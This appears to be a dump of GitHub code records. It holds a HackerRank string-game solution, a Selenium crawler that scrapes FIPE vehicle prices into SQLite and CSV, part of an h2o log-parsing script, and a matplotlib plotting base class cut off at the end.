Take user input, parse it and call other functions to execute the commands\n and extract run summary and store run result in json file\n\n @return: none\n \"\"\"\n global g_test_root_dir\n global g_temp_filename\n\n if len(argv) < 2:\n print(\"invoke this script as python extractGLRMRuntimeJavaLog.py javatextlog.\\n\")\n sys.exit(1)\n else: # we may be in business\n javaLogText = argv[1] # filename while java log is stored\n\n print(\"your java text is {0}\".format(javaLogText))\n extractRunInto(javaLogText)\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"h2oai/h2o-3","sub_path":"scripts/extractGLRMRuntimeJavaLog.py","file_name":"extractGLRMRuntimeJavaLog.py","file_ext":"py","file_size_in_byte":4896,"program_lang":"python","lang":"en","doc_type":"code","stars":6553,"dataset":"github-code","pt":"61"} +{"seq_id":"19861288408","text":"def minion_game(string):\n # your code goes here\n kevinWords = {}\n stuartWords = {}\n \n vowel='AEIOU'\n length=len(string)\n \n for outsideScan in range(length):\n startLetter=string[outsideScan]\n for insideScan in range(1,length+1-outsideScan):\n subWord=string[outsideScan:outsideScan+insideScan]\n print(subWord)\n \n count = 0\n pos = 0\n isFound=string.find(subWord,pos)\n while(isFound != -1):\n count = count + 1\n pos = isFound + 1\n isFound=string.find(subWord,pos)\n print(count)\n \n if subWord[0] in vowel:\n kevinWords[subWord] = count\n else:\n stuartWords[subWord] = count\n \n stuartCount=sum(stuartWords.values())\n kevinCount=sum(kevinWords.values())\n \n if stuartCount == kevinCount:\n print('Draw')\n elif stuartCount > kevinCount:\n print('Stuart',stuartCount)\n else:\n print('Kevin',kevinCount)\n\nif __name__ == '__main__':\n s = input('input:')\n minion_game(s)\n\n","repo_name":"compwizdave/hackerrank-python","sub_path":"challenges/minion_game.py","file_name":"minion_game.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4637260376","text":"import csv\r\nimport time\r\nimport logging\r\nimport configparser\r\nimport os\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support.ui import Select\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.firefox.options import Options\r\n\r\nfrom sqlalchemy.orm import sessionmaker\r\nfrom sqlalchemy import create_engine\r\nfrom db_declarative import Reference, ReferenceHasMarca, Marca, Modelo, AnoModelo, Base, Status\r\n\r\nfrom time import sleep\r\n\r\n\r\nUNVISITED = 1\r\nVISITED = 2\r\nERROR = 3\r\n\r\npath = os.getcwd()\r\n\r\nconfig = configparser.ConfigParser()\r\nconfig.read('config.ini')\r\nMainDivName = config['DivVehicleDesc']['MainDivName']\r\nfilename = config['VehicleType']['filename']\r\nvehicle = config['VehicleType']['vehicle']\r\n\r\nclass PageValues:\r\n def __init__(self, marca, modelo, ano_modelo, preco):\r\n \"\"\"\r\n PageValues is started with values that will be saved in csv file.\r\n :param marca: product name in the web page\r\n :param modelo: web page title\r\n :param ano_modelo: product url\r\n :type ano_modelo: str\r\n :type modelo: str\r\n :type marca: str\r\n \"\"\"\r\n # this dictionary will be used to save data in csv file\r\n self.__values = {\r\n 'marca': marca,\r\n 'modelo': modelo,\r\n 'anoModelo': ano_modelo,\r\n 'preco': preco\r\n }\r\n # __csv_fields make save_data() method writes correctly in csv file.\r\n self.__csv_fields = self.__values.keys()\r\n self.__csv_file_name = filename\r\n\r\n 
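# The create-header-once-then-append CSV pattern implemented by the
# PageValues class above, condensed into a standalone helper. This is a
# sketch; the file name and fields in the usage line are illustrative,
# not taken from the crawler:
import csv, os

def append_row(path, fieldnames, row):
    """Append one dict as a CSV row, writing the header only on first use."""
    is_new = not os.path.exists(path)
    with open(path, 'a', newline='', encoding='utf-8') as fh:
        writer = csv.DictWriter(fh, fieldnames=fieldnames, delimiter=';')
        if is_new:
            writer.writeheader()  # header written once, when the file is created
        writer.writerow(row)

# e.g. append_row('fipe.csv', ['marca', 'modelo'], {'marca': 'Fiat', 'modelo': 'Uno'})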
@property\r\n def marca(self):\r\n \"\"\"\r\n Returns the url of a product\r\n :rtype: str\r\n \"\"\"\r\n return self.__values['marca']\r\n\r\n @property\r\n def modelo(self):\r\n \"\"\"\r\n Returns the product web page title\r\n :rtype: str\r\n \"\"\"\r\n return self.__values['modelo']\r\n\r\n @property\r\n def ano_modelo(self):\r\n \"\"\"\r\n Returns the product name\r\n :rtype: str\r\n \"\"\"\r\n return self.__values['anoModelo']\r\n\r\n @property\r\n def preco(self):\r\n return self.__values['preco']\r\n\r\n def __is_csv(self):\r\n \"\"\"\r\n Checks if the csv file already exists.\r\n Returns true if there is the csv file, and false if not.\r\n :rtype: bool\r\n \"\"\"\r\n try:\r\n # just open to check if there is the file\r\n with open(self.__csv_file_name, 'r') as file:\r\n file.close()\r\n return True\r\n # if it do not exists the exception will returns false\r\n except IOError:\r\n return False\r\n\r\n def __create_csv(self):\r\n \"\"\"\r\n Creates a csv file.\r\n Writes in the file the fields of each attributes.\r\n \"\"\"\r\n with open(self.__csv_file_name, 'w', newline='', encoding='utf-8') as csv_file:\r\n writer = csv.DictWriter(csv_file, fieldnames=self.__csv_fields, delimiter=';')\r\n writer.writeheader()\r\n\r\n def save_csv(self):\r\n \"\"\"\r\n Checks if the csv file already exists to write in it the\r\n product name, his title web page and his url.\r\n \"\"\"\r\n if not self.__is_csv():\r\n # creates the csv file if it did not exist.\r\n self.__create_csv()\r\n try:\r\n with open(self.__csv_file_name, 'a', newline='', encoding='utf-8') as csv_file:\r\n writer = csv.DictWriter(csv_file, fieldnames=self.__csv_fields, delimiter=';')\r\n writer.writerow(self.__values)\r\n except IOError: # this exception avoid a product does not have saved in csv file\r\n sleep(0.5)\r\n self.save_csv()\r\n # display on the screen what is being record on csv\r\n for key, value in self.__values.items():\r\n print('{}: {}'.format(key, value), end='; ' if key != 'preco' else '\\n')\r\n\r\n def __str__(self):\r\n return 'PageValues: (marca: {}, modelo: {}, ano_modelo: {}, preco:{}'.format(\r\n self.marca, self.modelo, self.ano_modelo, self.preco\r\n )\r\n\r\n\r\nclass Element:\r\n def __init__(self, div, select):\r\n self.div = div # browser.find_element_by_id('selectTabelaReferencia'+vehicle+'_chosen')\r\n self.element = select # browser.find_element_by_id('selectTabelaReferencia'+vehicle)\r\n self.select = Select(self.element)\r\n self.options = [x for x in self.element.find_elements_by_tag_name('option')]\r\n self.texts = [r.get_attribute('innerHTML').replace('&', '&') for r in self.options]\r\n\r\n def div_click(self):\r\n self.div.click()\r\n\r\n def selelct_by_index(self, index):\r\n self.select.select_by_index(index)\r\n\r\n\r\nclass DataElement(Element):\r\n def __init__(self, div, select):\r\n super(DataElement, self).__init__(div, select)\r\n self.input = self.div.find_element_by_tag_name('input')\r\n\r\n def input_send(self, keys):\r\n self.input.send_keys(keys)\r\n self.input.send_keys(Keys.ENTER)\r\n\r\n def selection(self, text):\r\n self.div_click()\r\n self.input_send(text)\r\n pause()\r\n\r\n\r\nclass Database:\r\n logging.basicConfig(level=logging.INFO)\r\n logger = logging.getLogger('DATABASE')\r\n\r\n handler = logging.FileHandler('database.log')\r\n handler.setLevel(logging.DEBUG)\r\n formater = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\r\n handler.setFormatter(formater)\r\n logger.addHandler(handler)\r\n\r\n engine = 
create_engine('sqlite:///fipe.db')\r\n Base.metadata.bind = engine\r\n DBSession = sessionmaker(bind=engine)\r\n session = DBSession()\r\n\r\n def save_database(self, data):\r\n try:\r\n self.logger.info('save_database {}'.format(str(data)))\r\n self.session.add(data)\r\n self.session.commit()\r\n except Exception as error:\r\n self.logger.error('save database {} {}'.format(data, error))\r\n pause()\r\n self.save_database(data)\r\n\r\n def save_reference(self, reference_list):\r\n self.logger.info('save_reference {}'.format(str(reference_list)))\r\n if self.has_unvisited_reference() or self.reference_count() == 0:\r\n for period in reference_list:\r\n self.logger.info('period: {}'.format(period))\r\n if self.has_not_reference(period):\r\n reference = Reference(period=period)\r\n self.save_database(reference)\r\n\r\n def reference_count(self):\r\n self.logger.info('has_reference')\r\n query = self.session.query(Reference).count()\r\n self.logger.info('has_reference {}'.format(query))\r\n return query\r\n\r\n def has_not_reference(self, period):\r\n self.logger.info('has_not_reference {}'.format(str(period)))\r\n query = self.session.query(Reference).filter(Reference.period == period).count()\r\n self.logger.info('has_not_reference {} {}'.format(period, True if query == 0 else False))\r\n if query == 0:\r\n return True\r\n return False\r\n\r\n def has_unvisited_reference(self):\r\n self.logger.info('has_unvisited_reference')\r\n query = self.session.query(Reference).filter(Reference.status == UNVISITED).count()\r\n self.logger.info('has_unvisited_reference {}'.format(True if query > 0 else False))\r\n if query > 0:\r\n return True\r\n return False\r\n\r\n def get_unvisted_reference(self):\r\n self.logger.info('has_unvisited_reference')\r\n query = self.session.query(Reference).filter(Reference.status == UNVISITED).all()\r\n self.logger.info('has_unvisited_reference {}'.format(query))\r\n return query[0]\r\n\r\n def has_marca_unvisited(self):\r\n self.logger.info('has_marca_unvisited')\r\n query = self.session.query(Marca).filter(Marca.status == UNVISITED).count()\r\n self.logger.info('has_query_unvisited'.format(True if query > 0 else False))\r\n if query > 0:\r\n return True\r\n return False\r\n\r\n def has_marca(self, name):\r\n self.logger.info('has_marca {}'.format(name))\r\n query = self.session.query(Marca).filter(Marca.name == name).count()\r\n self.logger.info('has_marca {} - {}'.format(name, True if query > 0 else False))\r\n if query > 0:\r\n return True\r\n return False\r\n\r\n def set_unvisited_marca(self, name):\r\n self.logger.info('set_marca_unvisited {}'.format(name))\r\n marca = self.session.query(Marca).filter(Marca.name == name).one()\r\n marca.status = UNVISITED\r\n self.save_database(marca)\r\n self.logger.info('set_marca_unvisited {}'.format(marca.status))\r\n\r\n def get_marca_id(self, name):\r\n self.logger.info('get_marca_id {}'.format(name))\r\n query = self.session.query(Marca).filter(Marca.name == name).one()\r\n self.logger.info('get_marca_id {}'.format(query.id))\r\n return query.id\r\n\r\n def save_marcas(self, marca_list, reference_id):\r\n self.logger.info('save_marca {} - {}'.format(reference_id, marca_list))\r\n for marca in marca_list:\r\n self.logger.info('for marca in marca_list: {}'.format(marca))\r\n if self.has_marca(marca):\r\n self.logger.info('setting unvisited marca {}'.format(marca))\r\n self.set_unvisited_marca(marca)\r\n marca_id = self.get_marca_id(marca)\r\n else:\r\n self.logger.info('new marca {}'.format(marca))\r\n new_marca = 
Marca(name=marca)\r\n self.save_database(new_marca)\r\n marca_id = new_marca.id\r\n reference_marca = ReferenceHasMarca(reference_id=reference_id, marca_id=marca_id)\r\n self.save_database(reference_marca)\r\n\r\n def get_unvisted_marca(self):\r\n self.logger.info('get_unvisited_marca')\r\n query = self.session.query(Marca).filter(Marca.status == UNVISITED).all()\r\n self.logger.info('get_unvisited_marca {}'.format(query[0]))\r\n return query[0]\r\n\r\n def save_modelos(self, modelo_list, marca_id):\r\n self.logger.info('save_modelos {} {}'.format(marca_id, modelo_list))\r\n for modelo in modelo_list:\r\n if self.has_modelo(modelo):\r\n self.logger.info('has modelo {}'.format(modelo))\r\n self.logger.info('setting unvisited modelo {}'.format(modelo))\r\n self.set_unvisted_modelo(modelo)\r\n else:\r\n self.logger.info('new modelo {}'.format(modelo))\r\n self.logger.info('hasn\\'t modelo')\r\n new_modelo = Modelo(name=modelo, marca_id=marca_id)\r\n self.save_database(new_modelo)\r\n\r\n def has_modelo(self, name):\r\n self.logger.info('has_modelo {}'.format(name))\r\n query = self.session.query(Modelo).filter(Modelo.name == name).count()\r\n self.logger.info('has_modelo {} {}'.format(name, True if query > 0 else False))\r\n if query > 0:\r\n return True\r\n return False\r\n\r\n def set_unvisted_modelo(self, name):\r\n self.logger.info('set_unvisited_modelo {}'.format(name))\r\n modelo = self.session.query(Modelo).filter(Modelo.name == name).one()\r\n modelo.status = UNVISITED\r\n self.save_database(modelo)\r\n self.logger.info('set_unvisited_modelo {} {}'.format(modelo.name, modelo.id))\r\n\r\n def has_unvisited_modelo(self):\r\n self.logger.info('has_unvisited_modelo')\r\n query = self.session.query(Modelo).filter(Modelo.status == UNVISITED).count()\r\n self.logger.info('has_unvisited_modelo {}'.format(True if query > 0 else False))\r\n if query > 0:\r\n return True\r\n return False\r\n\r\n def get_unvisited_modelo(self):\r\n self.logger.info('get_unvisited_modelo')\r\n query = self.session.query(Modelo).filter(Modelo.status == UNVISITED).all()\r\n self.logger.info('get_unvisited_modelo {}'.format(query[0]))\r\n return query[0]\r\n\r\n def has_unvisited_ano(self):\r\n self.logger.info('has_unvisited_ano')\r\n query = self.session.query(AnoModelo).filter(AnoModelo.status == UNVISITED).count()\r\n self.logger.info('has_unvisited_ano {}'.format(True if query > 0 else False))\r\n if query > 0:\r\n return True\r\n return False\r\n\r\n def save_anos(self, ano_list, modelo_id):\r\n self.logger.info('save_anos {} {}'.format(modelo_id, ano_list))\r\n for ano in ano_list:\r\n self.logger.info('new ano {}'.format(ano))\r\n new_ano = AnoModelo(ano_modelo=ano, modelo_id=modelo_id)\r\n self.save_database(new_ano)\r\n\r\n def has_ano(self, ano):\r\n self.logger.info('has_ano {}'.format(ano))\r\n query = self.session.query(AnoModelo).filter(AnoModelo.ano_modelo == ano).count()\r\n self.logger.info('has_ano {} {} {}'.format(ano.id, ano.ano_modelo, True if query > 0 else False))\r\n if query > 0:\r\n return True\r\n return False\r\n\r\n def set_unvisited_ano(self, ano):\r\n self.logger.info('set_unvisited_ano {}'.format(ano))\r\n ano = self.session.query(AnoModelo).filter(AnoModelo.ano_modelo == ano).one()\r\n ano.status = UNVISITED\r\n self.save_database(ano)\r\n self.logger.info('set_unvisited_ano {} {}'.format(ano.ano_modelo, ano.status))\r\n\r\n def get_unvisited_ano(self):\r\n self.logger.info('get_unvisited_ano')\r\n query = self.session.query(AnoModelo).filter(AnoModelo.status == UNVISITED).all()\r\n 
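# All of the has_*/get_unvisited_* methods in this class share one query
# shape. A generic helper (sketch; `session`, the mapped classes and the
# UNVISITED constant are the ones defined above) would both deduplicate
# them and avoid the IndexError that .all()[0] raises on an empty result:
def first_unvisited(session, model):
    """Return the first row of `model` still flagged UNVISITED, or None."""
    return session.query(model).filter(model.status == UNVISITED).first()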
self.logger.info('get_unvisited_ano {}'.format(query[0].ano_modelo))\r\n return query[0]\r\n\r\n def set_modelo_visited(self, id):\r\n self.logger.info('set_modelo_visited {}'.format(id))\r\n modelo = self.session.query(Modelo).filter(Modelo.id == id).one()\r\n modelo.status = VISITED\r\n self.save_database(modelo)\r\n self.logger.info('set_modelo_visited {} {}'.format(modelo.name, modelo.status))\r\n\r\n def set_ano_visited(self, id):\r\n self.logger.info('set_ano_visited {}'.format(id))\r\n ano = self.session.query(AnoModelo).filter(AnoModelo.id == id).one()\r\n ano.status = VISITED\r\n self.save_database(ano)\r\n self.logger.info('set_ano_visited {} {}'.format(ano.ano_modelo, ano.status))\r\n\r\n def set_marca_visited(self, id):\r\n self.logger.info('set_marca_visited {}'.format(id))\r\n marca = self.session.query(Marca).filter(Marca.id == id).one()\r\n marca.status = VISITED\r\n self.save_database(marca)\r\n self.logger.info('set_marca_visited {} {}'.format(marca.name, marca.status))\r\n\r\n def set_reference_visited(self, id):\r\n self.logger.info('set_reference_visited {}'.format(id))\r\n ref = self.session.query(Reference).filter(Reference.id == id).one()\r\n ref.status = VISITED\r\n self.save_database(ref)\r\n self.logger.info('set_reference_visited {} {}'.format(ref.name, ref.status))\r\n\r\n\r\nclass App:\r\n logging.basicConfig(level=logging.INFO)\r\n logger = logging.getLogger('App')\r\n\r\n handler = logging.FileHandler('App.log')\r\n handler.setLevel(logging.DEBUG)\r\n formater = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\r\n handler.setFormatter(formater)\r\n logger.addHandler(handler)\r\n\r\n def __init__(self):\r\n self.logger.info('criando App()')\r\n self.options = Options()\r\n self.options.add_argument('-headless')\r\n self.logger.info('iniciando browser')\r\n self.browser = webdriver.Firefox(\r\n executable_path=path+'/firefox/geckodriver',\r\n firefox_options=self.options\r\n )\r\n self.logger.info('abrindo http://veiculos.fipe.org.br/')\r\n self.browser.get(\"http://veiculos.fipe.org.br/\")\r\n self.logger.info('abrindo banco de dados')\r\n self.database = Database()\r\n self.reference_element = None\r\n self.marca_element = None\r\n self.modelo_element = None\r\n self.ano_element = None\r\n self.reference = None\r\n self.marca = None\r\n self.modelo = None\r\n self.ano = None\r\n self.logger.info('App() criado')\r\n\r\n def restart_browser(self):\r\n self.logger.info('encerrando browser')\r\n self.browser.quit()\r\n self.logger.info('dormindo')\r\n for i in range(1800): # 1800 * 1 segundos == 30 minutos\r\n pause()\r\n self.logger.info('reiniciano browser')\r\n self.browser = webdriver.Firefox(\r\n executable_path=path+'/firefox/geckodriver',\r\n firefox_options=self.options\r\n )\r\n self.logger.info('abrindo http://veiculos.fipe.org.br/')\r\n try:\r\n self.browser.get(\"http://veiculos.fipe.org.br/\")\r\n self.browser.find_element_by_link_text(MainDivName).click()\r\n except Exception as err:\r\n self.logger.error(err)\r\n self.restart_browser()\r\n\r\n def selection(self, div, input, text):\r\n self.logger.info('inserindo {} text no input'.format(text))\r\n div.click()\r\n input.send_keys(text)\r\n input.send_keys(Keys.ENTER)\r\n pause()\r\n\r\n def save_search(self):\r\n self.logger.info('salvando busca')\r\n self.browser.find_element_by_id('buttonPesquisar'+vehicle).click()\r\n self.logger.info('botão pesquisarclicado')\r\n result = self.browser.find_element_by_id('resultadoConsulta'+vehicle+'Filtros')\r\n 
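# The fixed one-second pause() used throughout this crawler can be replaced
# by an explicit Selenium wait, which returns as soon as the element is
# ready instead of always sleeping. A standalone sketch, not part of the
# original class:
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

def wait_for_element(browser, element_id, timeout=10):
    """Block until the element is visible, or raise TimeoutException."""
    return WebDriverWait(browser, timeout).until(
        EC.visibility_of_element_located((By.ID, element_id)))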
self.logger.info('pegando valores dos campos')\r\n table = result.find_element_by_tag_name('table')\r\n info = table.find_elements_by_tag_name('td')\r\n values = PageValues(info[5].text, info[7].text, info[9].text, info[15].text)\r\n self.logger.info('valores da tabela pegos: {}'.format(values))\r\n self.ano.codigo_fipe = info[3].text\r\n self.ano.preco = info[15].text\r\n self.logger.info('atualizando valores no banco de dados')\r\n values.save_csv()\r\n self.browser.find_element_by_id('buttonLimparPesquisar'+vehicle).click()\r\n self.logger.info('botão limpar busca clicado')\r\n pause()\r\n self.logger.info('pausa terminada')\r\n\r\n def select_reference(self):\r\n self.logger.info('selecionando mês de referência')\r\n self.reference_element = Element(\r\n self.browser.find_element_by_id('selectTabelaReferencia'+vehicle+'_chosen'),\r\n self.browser.find_element_by_id('selectTabelaReferencia'+vehicle)\r\n )\r\n self.logger.info('Elemento reference criado')\r\n self.database.save_reference(self.reference_element.texts)\r\n self.logger.info('lista do combobox de referência salva no banco de dados')\r\n while self.database.has_unvisited_reference():\r\n self.logger.info('existe item no combobox não visitado')\r\n self.reference = self.database.get_unvisted_reference()\r\n self.logger.info('referencia pega no banco de dados: {}'.format(self.reference))\r\n self.reference_element.div_click()\r\n self.logger.info('div referencia clicada')\r\n self.reference_element.selelct_by_index(self.reference.id - 1)\r\n self.logger.info('selecionado o item {} do combobox'.format(self.reference.id - 1))\r\n self.select_marca()\r\n self.database.set_reference_visited(self.reference.id)\r\n self.logger.info('reference atualizado para visitado {}'.format(self.reference.status))\r\n\r\n def select_marca(self):\r\n self.logger.info('selecionando marca')\r\n self.marca_element = DataElement(\r\n self.browser.find_element_by_id('selectMarca'+vehicle+'_chosen'),\r\n self.browser.find_element_by_id('selectMarca'+vehicle)\r\n )\r\n self.logger.info('DataElement criado')\r\n\r\n self.logger.info('consultando banco de dados para salvar as marcas')\r\n if not self.database.has_marca_unvisited():\r\n self.database.save_marcas(self.marca_element.texts, self.reference.id)\r\n\r\n while self.database.has_marca_unvisited():\r\n self.logger.info('marca não visitada')\r\n self.marca = self.database.get_unvisted_marca()\r\n self.logger.info('marca selecionada: {}'.format(self.marca.name))\r\n self.marca_element.selection(self.marca.name)\r\n self.logger.info('fazendo seleção da marca')\r\n pause()\r\n self.logger.info('pausa para load do ajax terminada')\r\n self.select_modelo()\r\n self.database.set_marca_visited(self.marca.id)\r\n self.logger.info('marca {} marcada como visitada {}'.format(self.marca.name, self.marca.status))\r\n self.logger.info('todos os modelos da marca {} foram visitados'.format(self.marca.name))\r\n\r\n def select_modelo(self):\r\n self.logger.info('selecionando modelo')\r\n self.modelo_element = DataElement(\r\n self.browser.find_element_by_id('selectAnoModelo'+vehicle+'_chosen'),\r\n self.browser.find_element_by_id('selectAnoModelo'+vehicle)\r\n )\r\n self.logger.info('DataElement do modelo lido')\r\n\r\n self.logger.info('checando banco de dados para salvar novos elementos')\r\n if not self.database.has_unvisited_modelo():\r\n self.database.save_modelos(self.modelo_element.texts, self.marca.id)\r\n while self.database.has_unvisited_modelo():\r\n self.logger.info('modelos não visitados')\r\n 
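# select_marca, select_modelo and select_ano all share this resumable loop:
# pull one UNVISITED row, process it, then flag it VISITED, so an
# interrupted run restarts where it stopped. The generic shape (sketch;
# the callables are stand-ins for the Database methods above):
def drain_unvisited(has_next, get_next, process, mark_visited):
    """Process pending items; an item stays UNVISITED if process() raises."""
    while has_next():
        item = get_next()     # e.g. Database.get_unvisited_modelo
        process(item)         # on an exception the flag is never flipped
        mark_visited(item)    # reached only after a successful pass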
self.modelo = self.database.get_unvisited_modelo()\r\n self.logger.info('modelo selecionado do banco de dados: {}'.format(self.modelo.name))\r\n self.marca_element.selection(self.marca.name)\r\n self.logger.info('elemento marca selecionado')\r\n self.modelo_element.selection(self.modelo.name)\r\n self.logger.info('elemento modelo selecionado')\r\n self.select_ano()\r\n self.database.set_modelo_visited(self.modelo.id)\r\n self.logger.info('modelo {} atualizado para visitado: {}'.format(self.modelo.name, self.modelo.status))\r\n self.logger.info('não existe mais modelo a visitar')\r\n\r\n def select_ano(self):\r\n self.logger.info('selecionando ano do modelo')\r\n self.ano_element = DataElement(\r\n self.browser.find_element_by_id('selectAno'+vehicle+'_chosen'),\r\n self.browser.find_element_by_id('selectAno'+vehicle)\r\n )\r\n self.logger.info('DataElement do ano criado')\r\n\r\n self.logger.info('Verificando banco de dados para salvar novos itens')\r\n if not self.database.has_unvisited_ano():\r\n self.database.save_anos(self.ano_element.texts, self.modelo.id)\r\n\r\n while self.database.has_unvisited_ano():\r\n self.logger.info('Possui ano não visitado')\r\n try:\r\n self.ano = self.database.get_unvisited_ano()\r\n self.logger.info('ano obtido do banco de dados: {}'.format(self.ano.ano_modelo))\r\n self.marca_element.selection(self.marca.name)\r\n self.logger.info('selecionando marca')\r\n self.modelo_element.selection(self.modelo.name)\r\n self.logger.info('selecionando modelo')\r\n self.ano_element.selection(self.ano.ano_modelo)\r\n self.logger.info('selecionando ano')\r\n self.save_search()\r\n self.logger.info('busca salva')\r\n self.database.set_ano_visited(self.ano.id)\r\n self.logger.info('ano {} marcado como visitado {}'.format(self.ano.ano_modelo, self.ano.status))\r\n except Exception as error:\r\n self.logger.error('não foi possível selecionar os elementos {}'.format(error))\r\n self.restart_browser()\r\n self.logger.info('Não possui anos não visitados')\r\n\r\n def run(self):\r\n self.browser.find_element_by_link_text(MainDivName).click()\r\n self.select_reference()\r\n\r\n#Change to game crawler detection, might have to use randint\r\ndef pause():\r\n sleep(1)\r\n\r\n\r\nif __name__ == '__main__':\r\n start = time.time()\r\n app = App()\r\n # app.run()\r\n try:\r\n app.run()\r\n except Exception as e:\r\n print(e)\r\n app.browser.quit()\r\n total = int(time.time() - start)\r\n second = total % 60\r\n minute = total // 60 % 60\r\n hour = total // 3600\r\n print('{}:{}:{}'.format(hour, minute, second))\r\n","repo_name":"pumar/fipe-crawler","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":24253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21020906994","text":"###############################################################################\r\n#\r\n# AbstractPlot.py - Abstract base class for plotting.\r\n#\r\n###############################################################################\r\n# #\r\n# This program is free software: you can redistribute it and/or modify #\r\n# it under the terms of the GNU General Public License as published by #\r\n# the Free Software Foundation, either version 3 of the License, or #\r\n# (at your option) any later version. #\r\n# #\r\n# This program is distributed in the hope that it will be useful, #\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of #\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the #\r\n# GNU General Public License for more details. #\r\n# #\r\n# You should have received a copy of the GNU General Public License #\r\n# along with this program. If not, see . #\r\n# #\r\n###############################################################################\r\n\r\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\r\nfrom matplotlib.figure import Figure\r\nimport matplotlib.transforms as mtransforms\r\n\r\nfrom matplotlib.patches import Rectangle\r\n\r\nimport matplotlib as mpl\r\n\r\nimport numpy as np\r\n\r\n\r\nclass AbstractPlot(FigureCanvas):\r\n '''\r\n Abstract base class for plotting.\r\n '''\r\n def __init__(self, options):\r\n self.options = options\r\n\r\n # Global plot settings\r\n mpl.rcParams['font.size'] = self.options.font_size\r\n mpl.rcParams['axes.titlesize'] = self.options.font_size\r\n mpl.rcParams['axes.labelsize'] = self.options.font_size\r\n mpl.rcParams['xtick.labelsize'] = self.options.font_size\r\n mpl.rcParams['ytick.labelsize'] = self.options.font_size\r\n mpl.rcParams['legend.fontsize'] = self.options.font_size\r\n mpl.rcParams['svg.fonttype'] = 'none'\r\n\r\n self.fig = Figure(facecolor='white', dpi=options.dpi)\r\n\r\n FigureCanvas.__init__(self, self.fig)\r\n\r\n self.cid = None\r\n\r\n self.type = ''\r\n self.name = ''\r\n\r\n self.axesColour = (0.5, 0.5, 0.5)\r\n\r\n def savePlot(self, filename, dpi=300):\r\n imgFormat = filename[filename.rfind('.') + 1:len(filename)]\r\n if imgFormat in ['png', 'pdf', 'ps', 'eps', 'svg']:\r\n self.fig.savefig(filename, format=imgFormat, dpi=dpi, facecolor='white', edgecolor='white', bbox_inches='tight')\r\n else:\r\n pass\r\n\r\n def labelExtents(self, xLabels, xFontSize, xRotation, yLabels, yFontSize, yRotation):\r\n self.fig.clear()\r\n\r\n tempAxes = self.fig.add_axes([0, 0, 1.0, 1.0])\r\n\r\n tempAxes.set_xticks(np.arange(len(xLabels)))\r\n tempAxes.set_yticks(np.arange(len(yLabels)))\r\n\r\n xText = tempAxes.set_xticklabels(xLabels, size=xFontSize, rotation=xRotation)\r\n yText = tempAxes.set_yticklabels(yLabels, size=yFontSize, rotation=yRotation)\r\n\r\n bboxes = []\r\n for label in xText:\r\n bbox = label.get_window_extent(self.get_renderer())\r\n bboxi = bbox.inverse_transformed(self.fig.transFigure)\r\n bboxes.append(bboxi)\r\n xLabelBounds = mtransforms.Bbox.union(bboxes)\r\n\r\n bboxes = []\r\n for label in yText:\r\n bbox = label.get_window_extent(self.get_renderer())\r\n bboxi = bbox.inverse_transformed(self.fig.transFigure)\r\n bboxes.append(bboxi)\r\n yLabelBounds = mtransforms.Bbox.union(bboxes)\r\n\r\n self.fig.clear()\r\n\r\n return xLabelBounds, yLabelBounds\r\n\r\n def xLabelExtents(self, labels, fontSize, rotation=0):\r\n self.fig.clear()\r\n\r\n tempAxes = self.fig.add_axes([0, 0, 1.0, 1.0])\r\n tempAxes.set_xticks(np.arange(len(labels)))\r\n xLabels = tempAxes.set_xticklabels(labels, size=fontSize, rotation=rotation)\r\n\r\n bboxes = []\r\n for label in xLabels:\r\n bbox = label.get_window_extent(self.get_renderer())\r\n bboxi = bbox.inverse_transformed(self.fig.transFigure)\r\n bboxes.append(bboxi)\r\n xLabelBounds = mtransforms.Bbox.union(bboxes)\r\n\r\n self.fig.clear()\r\n\r\n return xLabelBounds\r\n\r\n def yLabelExtents(self, labels, fontSize, rotation=0):\r\n self.fig.clear()\r\n\r\n tempAxes = self.fig.add_axes([0, 0, 1.0, 1.0])\r\n tempAxes.set_yticks(np.arange(len(labels)))\r\n yLabels = tempAxes.set_yticklabels(labels, size=fontSize, rotation=rotation)\r\n\r\n bboxes = []\r\n for label in yLabels:\r\n bbox = 
label.get_window_extent(self.get_renderer())\r\n bboxi = bbox.inverse_transformed(self.fig.transFigure)\r\n bboxes.append(bboxi)\r\n yLabelBounds = mtransforms.Bbox.union(bboxes)\r\n\r\n self.fig.clear()\r\n\r\n return yLabelBounds\r\n\r\n def formatLabels(self, labels):\r\n formattedLabels = []\r\n for label in labels:\r\n value = float(label.get_text())\r\n if value < 0.01:\r\n valueStr = '%.2e' % value\r\n if 'e-00' in valueStr:\r\n valueStr = valueStr.replace('e-00', 'e-')\r\n elif 'e-0' in valueStr:\r\n valueStr = valueStr.replace('e-0', 'e-')\r\n else:\r\n valueStr = '%.3f' % value\r\n\r\n formattedLabels.append(valueStr)\r\n\r\n return formattedLabels\r\n\r\n def removeExtraZeros(self, label):\r\n if '.' in label:\r\n while label[-1] == '0':\r\n label = label[0:-1]\r\n\r\n if label[-1] == '.': # remove potential trailing decimal point\r\n label = label[0:-1]\r\n\r\n return label\r\n\r\n def boundingBox(self, data, ax, label, bBoundingBoxes, bLabels):\r\n ''' Draw bounding box around data.'''\r\n data = np.array(data)\r\n\r\n width = max(data[:, 0]) - min(data[:, 0])\r\n height = max(data[:, 1]) - min(data[:, 1])\r\n r = Rectangle((min(data[:, 0]), min(data[:, 1])), width, height)\r\n\r\n if bBoundingBoxes:\r\n ax.add_artist(r)\r\n r.set_clip_box(ax.bbox)\r\n r.set_alpha(0.1)\r\n r.set_facecolor((0.5, 0.5, 0.5))\r\n\r\n if bLabels:\r\n ax.annotate(label, xy=(min(data[:, 0]), max(data[:, 1])), xytext=(0, 0),\r\n textcoords='offset points', ha='right', va='bottom',\r\n bbox=dict(boxstyle='round,pad=0.5', 